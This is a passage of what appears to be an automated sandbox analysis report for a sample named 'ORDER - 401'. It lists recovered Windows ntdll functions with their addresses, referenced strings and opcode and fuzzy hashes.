                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 0-1783798831
                                                                                  • Opcode ID: 0baac97f1b616b35e80fa050b7e74d0126c1ddcb69c6f32ba00f69b662741315
                                                                                  • Instruction ID: fdd596af89e477120d8d04e1ef88dd180ecebb8b05bd43c665001982b1fdf6b3
                                                                                  • Opcode Fuzzy Hash: 0baac97f1b616b35e80fa050b7e74d0126c1ddcb69c6f32ba00f69b662741315
                                                                                  • Instruction Fuzzy Hash: 914125B1945315ABE726EB68DD80B9B77E8BF48750F00453AF9D8D3291E7B0D840CB91
                                                                                  Function 010CC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • @, xrefs: 010CC1F1
                                                                                  • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 010CC1C5
                                                                                  • PreferredUILanguages, xrefs: 010CC212
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                  • API String ID: 0-2968386058
                                                                                  • Opcode ID: 8f1e2b76d980330cf1c831fd729956688b870f5fb49a8cde47ea9551ab7751c4
                                                                                  • Instruction ID: 398e9f32534073c47e7657cda15a1a2e89c69de817fb4a541bd3cea884e90b54
                                                                                  • Opcode Fuzzy Hash: 8f1e2b76d980330cf1c831fd729956688b870f5fb49a8cde47ea9551ab7751c4
                                                                                  • Instruction Fuzzy Hash: A4416171E00219EBEF51DBD8C951BEEBBF9AB14B00F14406AEA49B7290D7749E44CF50
                                                                                  Function 010A4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                  • API String ID: 0-1373925480
                                                                                  • Opcode ID: 95fa8bff434819559b838bdc9953e138036dda644062ff137db86740348ab7f7
                                                                                  • Instruction ID: eafc0d39a20c03b6f4dbf1ba606b8d9527cd8596a651df1fa49bebd9c519a67f
                                                                                  • Opcode Fuzzy Hash: 95fa8bff434819559b838bdc9953e138036dda644062ff137db86740348ab7f7
                                                                                  • Instruction Fuzzy Hash: C641E335A042598BEB21DBE9C840BADBBF8FF55340F5804A9D981EF792D7B49901CB10
                                                                                  Function 01094755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • LdrpCheckRedirection, xrefs: 0109488F
                                                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 01094899
                                                                                  • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01094888
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                  • API String ID: 0-3154609507
                                                                                  • Opcode ID: 61d89fbee4676aa349347a9bc495a186968b42cfc65145eb8c883c5dfa5346fa
                                                                                  • Instruction ID: 8f15c7434d7027517979fe3ecfbde74a40106982a4f7cb4de015211c85cdf10a
                                                                                  • Opcode Fuzzy Hash: 61d89fbee4676aa349347a9bc495a186968b42cfc65145eb8c883c5dfa5346fa
                                                                                  • Instruction Fuzzy Hash: A841D332A146558FCF61CE59DA60A2FBBE4FF49A50F0505A9EDD8DB261D330D802EB81
                                                                                  Function 01020BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                  • API String ID: 0-2558761708
                                                                                  • Opcode ID: c4850323479405fc694f91fb90745562328483e56c8a1d56bcd06b104edb6df0
                                                                                  • Instruction ID: 965411afe837d07e17c5b2aa7d89630a98f5c9c2ce43cdd5c41c6b77fed8a998
                                                                                  • Opcode Fuzzy Hash: c4850323479405fc694f91fb90745562328483e56c8a1d56bcd06b104edb6df0
                                                                                  • Instruction Fuzzy Hash: BC1106317542529FEB6ACB18C844BFAB3A5EF40719F14816DF486CB295DF30D840C759
                                                                                  Function 010920DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 01092104
                                                                                  • Process initialization failed with status 0x%08lx, xrefs: 010920F3
                                                                                  • LdrpInitializationFailure, xrefs: 010920FA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 0-2986994758
                                                                                  • Opcode ID: 420c9b28597ccd47b5bdf994de11739ce6af0aaa00d9bfea443ff506513c46fd
                                                                                  • Instruction ID: 3f575b25f353761ef2f8d7b047873a1b9420715f802817db04703543ff52556d
                                                                                  • Opcode Fuzzy Hash: 420c9b28597ccd47b5bdf994de11739ce6af0aaa00d9bfea443ff506513c46fd
                                                                                  • Instruction Fuzzy Hash: F7F0C875A5030CBFEB24E64CDC56FE937A8EB50B54F100069F79067286D2F0A990D691
                                                                                  Function 010203E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID: ___swprintf_l
                                                                                  • String ID: #%u
                                                                                  • API String ID: 48624451-232158463
                                                                                  • Opcode ID: f3e810e623d3e9b38c98851d750e0713d7890b7ef1023454827e01acace110b4
                                                                                  • Instruction ID: 25e5f0a1c11ae461e1ae90987d178925e899c8d3b24a9e5418be336da90a457a
                                                                                  • Opcode Fuzzy Hash: f3e810e623d3e9b38c98851d750e0713d7890b7ef1023454827e01acace110b4
                                                                                  • Instruction Fuzzy Hash: 8C714971A0025A9FDB05DFA8C994BEEB7F8BF08304F144065E985EB255EA34ED41CB64
                                                                                  Function 0101A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • LdrResSearchResource Enter, xrefs: 0101AA13
                                                                                  • LdrResSearchResource Exit, xrefs: 0101AA25
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                  • API String ID: 0-4066393604
                                                                                  • Opcode ID: a0c12789788ff2632d5f4542edd06ecb2e639102deba460825552fd8a5c1c579
                                                                                  • Instruction ID: a91336a41b885416d080c5cb7c6a1995ce5fcc912a3e0479814749392b58fcd6
                                                                                  • Opcode Fuzzy Hash: a0c12789788ff2632d5f4542edd06ecb2e639102deba460825552fd8a5c1c579
                                                                                  • Instruction Fuzzy Hash: CDE1A171F01299DFEF22CEA8C980BEEBBB9BF04310F144466E981EB245D7789940CB54
                                                                                  Function 010DA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: `$`
                                                                                  • API String ID: 0-197956300
                                                                                  • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                  • Instruction ID: 3aa179abf87529710931dad2682d2c088b54d859222fbd84ad363321ab74f6f7
                                                                                  • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                  • Instruction Fuzzy Hash: 04C18D31304346DBEB25CE28C841B6BBBE5AFC8318F184A6DF6D68B290D775D505CB51
                                                                                  Function 0108E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID: Legacy$UEFI
                                                                                  • API String ID: 2994545307-634100481
                                                                                  • Opcode ID: ea95de93d3cc43603280abb8f908b2c906aafaed627d1acab1851e382bd54de0
                                                                                  • Instruction ID: 79fefde8364c8c8d03f469e8a3da1d46a34a1cde605e2141510607a5824da5aa
                                                                                  • Opcode Fuzzy Hash: ea95de93d3cc43603280abb8f908b2c906aafaed627d1acab1851e382bd54de0
                                                                                  • Instruction Fuzzy Hash: 15614B71E14619DFDB14EFA9C940BAEBBF5FB48700F144069EA89EB291D731A940CB50
                                                                                  Function 010B43D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$MUI
                                                                                  • API String ID: 0-17815947
                                                                                  • Opcode ID: 7be96790e191cf7f30db15ad7f9afe9748a37a7d103524a8e616371579281e5e
                                                                                  • Instruction ID: e3e4578ed356e490ad2d0ea0511b9262801119e58e8ba3da37790e06c01f93fa
                                                                                  • Opcode Fuzzy Hash: 7be96790e191cf7f30db15ad7f9afe9748a37a7d103524a8e616371579281e5e
                                                                                  • Instruction Fuzzy Hash: 11511871E0061DAEDB11DFA9CC80AEFBBB8AF48754F100529EA91E7291D7359A05CB60
                                                                                  Function 010104E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0101063D
                                                                                  • kLsE, xrefs: 01010540
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                  • API String ID: 0-2547482624
                                                                                  • Opcode ID: 931262513d9bdc8152a72b575373188347718352e59bce7857de26d07974c766
                                                                                  • Instruction ID: 30650d1413d0efc876a89b9dd32b748ae1c0c58075f9d78429aa48745431afcf
                                                                                  • Opcode Fuzzy Hash: 931262513d9bdc8152a72b575373188347718352e59bce7857de26d07974c766
                                                                                  • Instruction Fuzzy Hash: 4151C1715047428BD725EF68C5406A7BBE4AF88304F108C3EF6D987249E778D985CB92
                                                                                  Function 0101A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • RtlpResUltimateFallbackInfo Exit, xrefs: 0101A309
                                                                                  • RtlpResUltimateFallbackInfo Enter, xrefs: 0101A2FB
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                  • API String ID: 0-2876891731
                                                                                  • Opcode ID: 2c9971b9e29068ac92547488b012c896d4b4eec2bca706cccddf8aaac158702b
                                                                                  • Instruction ID: 5e07659a9be35b3038924c7ab08732b8bf5e2a3b5073ebc0215cb5486c388f4b
                                                                                  • Opcode Fuzzy Hash: 2c9971b9e29068ac92547488b012c896d4b4eec2bca706cccddf8aaac158702b
                                                                                  • Instruction Fuzzy Hash: 6441CF70B05695DBDB12CF69C840BAEBBF4FF84700F1480A5E984DB295E3B9DA40CB54
                                                                                  Function 0104A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID: Cleanup Group$Threadpool!
                                                                                  • API String ID: 2994545307-4008356553
                                                                                  • Opcode ID: 19e0258bdbc0d60e30530ccd7da83a80247c8879d8465fd66952e10b2e67fd41
                                                                                  • Instruction ID: e23b596c0cab994c9b3a0747858a4912db12baad5fafbd291348770090601b7c
                                                                                  • Opcode Fuzzy Hash: 19e0258bdbc0d60e30530ccd7da83a80247c8879d8465fd66952e10b2e67fd41
                                                                                  • Instruction Fuzzy Hash: 310128B2680740EFE311DF14CD85F5677E8E788B19F008939B699C7190E774D804CB4A
                                                                                  Function 0101C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: MUI
                                                                                  • API String ID: 0-1339004836
                                                                                  • Opcode ID: 5ef713996f3a59018896c52b3c327db0c10a53522baf121193d2c98729a6dc91
                                                                                  • Instruction ID: 05c2640da8e6c416eeeba1188a79f75b8923de8304c8a2d312dac4330390ef6d
                                                                                  • Opcode Fuzzy Hash: 5ef713996f3a59018896c52b3c327db0c10a53522baf121193d2c98729a6dc91
                                                                                  • Instruction Fuzzy Hash: E0828D75E402188FEB65CFA8C9847EDBBB1BF48310F1481A9E999AB358D7389D41CF50
                                                                                  Function 01096420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID: 0-3916222277
                                                                                  • Opcode ID: 5aa45d6498615d48b27894d55710bc3046d3939fec8ccf6ba5955b1d752e933f
                                                                                  • Instruction ID: 222f189b77e684d18419f4b581182ca641e12150b32975e559b146aa7c55b00f
                                                                                  • Opcode Fuzzy Hash: 5aa45d6498615d48b27894d55710bc3046d3939fec8ccf6ba5955b1d752e933f
                                                                                  • Instruction Fuzzy Hash: 0C916D72A00219ABEF21DF95CC95FEEBBB8EF58B50F104065F640AB190D775AD04DBA0
                                                                                  Function 010BE10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID: 0-3916222277
                                                                                  • Opcode ID: c67b1a42ef7c7353776542f921f6807e69fb7835d8ca1123b2b7a118901074ff
                                                                                  • Instruction ID: 45589de4cde3eae3ed48e999e8570afaab4c40a0730eb63356aa8c55f3c40402
                                                                                  • Opcode Fuzzy Hash: c67b1a42ef7c7353776542f921f6807e69fb7835d8ca1123b2b7a118901074ff
                                                                                  • Instruction Fuzzy Hash: 7991D271901609BFDB22AFA4DC84FEFBBB9EF45B40F100025F581A7251EB359941CB90
                                                                                  Function 0104A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: GlobalTags
                                                                                  • API String ID: 0-1106856819
                                                                                  • Opcode ID: 77b02014af701917de856287b5b8f130824045b65cb33b139abeb24713428192
                                                                                  • Instruction ID: 27aabf02c525399b0ceacf386902c541c68ecbd004b3ce667810ec32d6d69464
                                                                                  • Opcode Fuzzy Hash: 77b02014af701917de856287b5b8f130824045b65cb33b139abeb24713428192
                                                                                  • Instruction Fuzzy Hash: 10718DB5E0420ACFDF68EF98C5906EDBBF1BF48700F15816AE586AB341E7328941CB50
                                                                                  Function 010B4978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: .mui
                                                                                  • API String ID: 0-1199573805
                                                                                  • Opcode ID: 49b530387fd2200187ad3965b1a2facb4f1b662cabb95cd114cca5507a84b557
                                                                                  • Instruction ID: 75443aef52c39e1865fef83926a1a80bdeec37c58f8420dfdf1ebce63e647305
                                                                                  • Opcode Fuzzy Hash: 49b530387fd2200187ad3965b1a2facb4f1b662cabb95cd114cca5507a84b557
                                                                                  • Instruction Fuzzy Hash: 6251A872D0022A9BDF10DF99C880EEEBBB8AF15714F054169EA92FB241D3749D01CBE4
                                                                                  Function 0102E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: EXT-
                                                                                  • API String ID: 0-1948896318
                                                                                  • Opcode ID: 940a3e8b46cfd96de01a1ff33c8b831b87c361106890705d5ccec598edbe8e5d
                                                                                  • Instruction ID: cd9efec77e4df7a3ded7c7181dc49a52e0a97a4a5a28b998b390af3a53f95b7a
                                                                                  • Opcode Fuzzy Hash: 940a3e8b46cfd96de01a1ff33c8b831b87c361106890705d5ccec598edbe8e5d
                                                                                  • Instruction Fuzzy Hash: 9341AE72548322ABD720DA75C884BAFBBE8BF88B14F04096DFAC4D7180E674D904C797
                                                                                  Function 0108C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: BinaryHash
                                                                                  • API String ID: 0-2202222882
                                                                                  • Opcode ID: f57f0beec3a704196279f4be0634125c0247af411e1550e0db23df91e104471d
                                                                                  • Instruction ID: 090d945ad477d6774dc75c7ea699ea38f7e918c9ad39f30f25e5b675b5085e4a
                                                                                  • Opcode Fuzzy Hash: f57f0beec3a704196279f4be0634125c0247af411e1550e0db23df91e104471d
                                                                                  • Instruction Fuzzy Hash: 234144B1D1412DEBEB21EB50CD84FDEB77CAB44714F0045A5AA88AB140DB709E898BA4
                                                                                  Function 010A6B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: #
                                                                                  • API String ID: 0-1885708031
                                                                                  • Opcode ID: dcee3bb3f16fab64813e1f6466476f21b6b9ffcee46a0fb19534b90bfb561f1e
                                                                                  • Instruction ID: d3e1ab36237dc4632e784d0de150ee335a6e3f6f1503b93ac3931e3d634c4aae
                                                                                  • Opcode Fuzzy Hash: dcee3bb3f16fab64813e1f6466476f21b6b9ffcee46a0fb19534b90bfb561f1e
                                                                                  • Instruction Fuzzy Hash: F7311C31A0071D9ADB22DFA9C854BFEBBF8DF44704F584068E9919B281D777E845CB50
                                                                                  Function 0108CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: BinaryName
                                                                                  • API String ID: 0-215506332
                                                                                  • Opcode ID: 0e75ebabe379081c34a12479d5b52aba0c7642da25b7e397acec1e6fd55c82fe
                                                                                  • Instruction ID: d39a14d35c059b59bbefc901626ac7c88b87e0398af0aa5b9947f9f6663fac2a
                                                                                  • Opcode Fuzzy Hash: 0e75ebabe379081c34a12479d5b52aba0c7642da25b7e397acec1e6fd55c82fe
                                                                                  • Instruction Fuzzy Hash: 4F31F136904919AFFB15EA58CA45EEFBBB4EF80720F014169E985A7250D7309E00DBE0
                                                                                  Function 0109892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0109895E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                  • API String ID: 0-702105204
                                                                                  • Opcode ID: 1dabec5677b9a36bcbefe98fe8d3767aa6de885724ebc014e0225e44007f09d0
                                                                                  • Instruction ID: ccec44db1c0cefa15ddb5ea97df39cdc427fe1431ce06b966d7839fd1e22b691
                                                                                  • Opcode Fuzzy Hash: 1dabec5677b9a36bcbefe98fe8d3767aa6de885724ebc014e0225e44007f09d0
                                                                                  • Instruction Fuzzy Hash: B60170327002099FEF7A5B15CCA4B5A3FA1EF87354B0C402DF7C106651CFA06880EB92
                                                                                  Function 010B2000 Relevance: .8, Instructions: 757COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 3e8f34bc71aa47178d05220b4ce7afd320a8e94fea4b1887ae8e835a1e88b24c
                                                                                  • Instruction ID: d66f82fe80fc835b2c85b8087b3e5a41f99c3fbed875c2f49b1f8e8d49ebdca1
                                                                                  • Opcode Fuzzy Hash: 3e8f34bc71aa47178d05220b4ce7afd320a8e94fea4b1887ae8e835a1e88b24c
                                                                                  • Instruction Fuzzy Hash: 2842D0326083419BE765CF68C8D0AAFBBE5BF98740F08496DFAC297250D735E845CB52
                                                                                  Function 010A8158 Relevance: .6, Instructions: 617COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 2cb5c0a1b173f68f0d3f66963c8f08dd4ad7bf63b38c0667509bdb5276490568
                                                                                  • Instruction ID: 77be9f6b7af6fbbdfd33de6879849edc76cfe0ba538a0f012708f5cb58b3a4c4
                                                                                  • Opcode Fuzzy Hash: 2cb5c0a1b173f68f0d3f66963c8f08dd4ad7bf63b38c0667509bdb5276490568
                                                                                  • Instruction Fuzzy Hash: 9F424D75E002198FEB64CFA9C841BEDBBF5BF48301F54C19AE989AB241DB349985CF50
                                                                                  Function 01022840 Relevance: .6, Instructions: 605COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b551359dad359f9fe480b5e1ba48a5ed8ccfbf29958d1a98ed499cd29489b3af
                                                                                  • Instruction ID: 991c32527ed3a8bd4cc8f986b1860ab46cff10a44b43bcc06a8e19a77b8ec08d
                                                                                  • Opcode Fuzzy Hash: b551359dad359f9fe480b5e1ba48a5ed8ccfbf29958d1a98ed499cd29489b3af
                                                                                  • Instruction Fuzzy Hash: 6A32DD70E00B598BEB65CFA9C8447BEBBF2BF84704F14415DD4C69B285DB36A842CB54
                                                                                  Function 010BA118 Relevance: .6, Instructions: 591COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
